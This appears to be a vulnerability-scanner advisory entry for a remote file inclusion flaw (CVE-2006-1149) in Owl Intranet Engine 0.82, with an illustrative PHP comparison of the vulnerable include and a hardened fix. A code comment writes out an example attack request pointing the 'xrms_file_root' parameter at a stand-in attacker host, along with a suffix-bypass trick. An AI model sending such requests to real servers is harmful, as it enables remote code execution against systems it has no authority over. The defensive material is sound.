VID: 21858
Severity: 40
Port: 80, ...
Protocol: TCP
Class: CGI

Detailed Description:
Owl Intranet Engine is a multi-user document repository (knowledge base) system written in PHP4 for publishing files and documents on the Web. Owl Intranet Engine version 0.82, and other versions, is vulnerable to remote file inclusion in the 'lib/OWL_API.php' script, caused by improper validation of user-supplied input passed to the 'xrms_file_root' parameter, which the script uses as a path prefix for an include. Because the parameter is taken from a PHP global, exploitation depends on PHP's 'register_globals' setting being enabled: a remote attacker can then set the variable from the query string of a specially-crafted URL and point it at an attacker-controlled Web server, causing the affected host to fetch and execute arbitrary PHP code, and through it operating system commands, with the privileges of the Web server process. Inclusion of a remote URL additionally requires PHP's 'allow_url_fopen' setting to be enabled, which is its default.

References:
  * http://downloads.securityfocus.com/vulnerabilities/exploits/owl_082_xpl.pl
  * http://www.frsirt.com/english/advisories/2006/0868
  * http://secunia.com/advisories/19142/

Platforms Affected: Owl Intranet Engine version 0.82 and other versions; any operating system, any version
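The vulnerability class described above, shown as an added PHP example that is not the Owl project's code: the real contents of lib/OWL_API.php are not reproduced here, and the function names, the included file name (config.php) and the attacker host are assumptions. The vulnerable include pattern is placed beside a hardened form that no longer depends on register_globals being off.

```php
<?php
// Added illustrative example, not code from the Owl project. The actual
// contents of lib/OWL_API.php are not reproduced; the function names, the
// included file name (config.php) and the attacker host are assumptions.

// ---- Vulnerable pattern --------------------------------------------------
// $xrms_file_root is used as a path prefix but is never assigned by the
// script. With register_globals=On, a request such as
//   GET /lib/OWL_API.php?xrms_file_root=http://attacker.example/x
// creates that global from the query string before the include runs, so PHP
// (with allow_url_fopen=On, the default) fetches
//   http://attacker.example/x/config.php
// and executes whatever the attacker's server returns, as the web server
// user. Appending '?' to the injected URL makes the '/config.php' suffix part
// of the remote query string, so the attacker needs no particular file name.
function owl_api_include_vulnerable()
{
    global $xrms_file_root;
    include($xrms_file_root . '/config.php');
}

// ---- Hardened form -------------------------------------------------------
// 1. Assign the prefix unconditionally from this file's own location, so a
//    request-supplied global is overwritten rather than trusted. This is the
//    fix that works even where register_globals cannot be turned off.
// 2. Resolve the final path and refuse anything that is not a regular file
//    inside that directory (no URL schemes, no ../ traversal).
function owl_api_include_hardened()
{
    global $xrms_file_root;
    $root = realpath(dirname(__FILE__));
    $xrms_file_root = $root;                  // clobbers any injected value
    $target = $xrms_file_root . '/config.php';
    $real = realpath($target);
    if ($real === false
        || !is_file($real)
        || strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        // Fail closed; do not echo the attacker-controlled value unescaped.
        die('OWL_API: refusing to include ' . htmlspecialchars($target));
    }
    include($real);
}

// Defence in depth while the code is unpatched (Apache mod_php):
// register_globals can be set per directory, allow_url_fopen only system-wide.
//   .htaccess:  php_flag register_globals off
//   php.ini:    allow_url_fopen = Off
?>
```

The hardened function assigns the global before using it, so it is safe regardless of the register_globals setting; the realpath and prefix check are a second line of defence against local file inclusion should the prefix ever be derived from untrusted data again.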
Recommendation:
No upgrade or patch was available as of March 2006. Upgrade to a version of Owl later than 0.82 when a fixed version becomes available from the Owl download site at http://owl.sourceforge.net/modules/Download/. Until then, disable PHP's 'register_globals' setting (register_globals = Off in php.ini, or php_flag register_globals off in the Owl directory's .htaccess under Apache mod_php), which removes the injection vector this vulnerability depends on. Setting allow_url_fopen = Off in php.ini additionally prevents PHP from including remote URLs at all, at the cost of any other functionality that relies on it.
Related URL: CVE-2006-1149 (CVE)
Related URL: 17021 (SecurityFocus)
Related URL: 25082 (ISS)